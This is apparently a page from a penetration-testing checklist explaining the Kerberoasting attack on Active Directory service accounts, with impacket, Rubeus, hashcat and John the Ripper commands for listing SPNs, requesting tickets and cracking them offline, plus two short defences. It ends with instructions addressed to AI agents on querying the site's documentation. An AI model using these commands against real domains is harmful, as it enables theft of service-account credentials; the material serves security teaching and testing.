# Kerberoasting Attack ### Overview **Kerberoasting** is a post-exploitation attack in **Active Directory** that targets **service accounts**. * Service accounts can have **SPNs** registered. * When a user requests a service ticket for an SPN, the **TGS is encrypted using the service account’s NT hash.** * Any **authenticated domain user** can request these tickets. * An attacker can o**ffline crack** the ticket to recover the service account’s password. ### Attack Prerequisites * Valid domain user credentials (any low-priv user). * At least one service account with an SPN. * Weak or Crackable Service Account Passwords ### Steps 1. Identify Service Accounts with SPNs. ```bash impacket-GetUserSPNs toffee.bth/SVC_TGS:password1 -dc-ip 10.10.10.100 ``` 2. Request the TGS from these SPNs. ```bash # Linux impacket-GetUserSPNs toffee.bth/SVC_TGS:password1 -dc-ip 10.10.10.100 -request # Windows .\Rubeus.exe kerberoast /outfile:hashes.kerberoast ``` 3. Crack these hashes. ```bash hashcat -m 13100 kerberoast.txt wordlist.txt john kerberoast.txt wordlist.txt ``` ### Defences 1. Use Strong Service Account Passwords. 2. Minimize Service Account Privileges. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/post-compromise-attacks/kerberoasting-attack.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.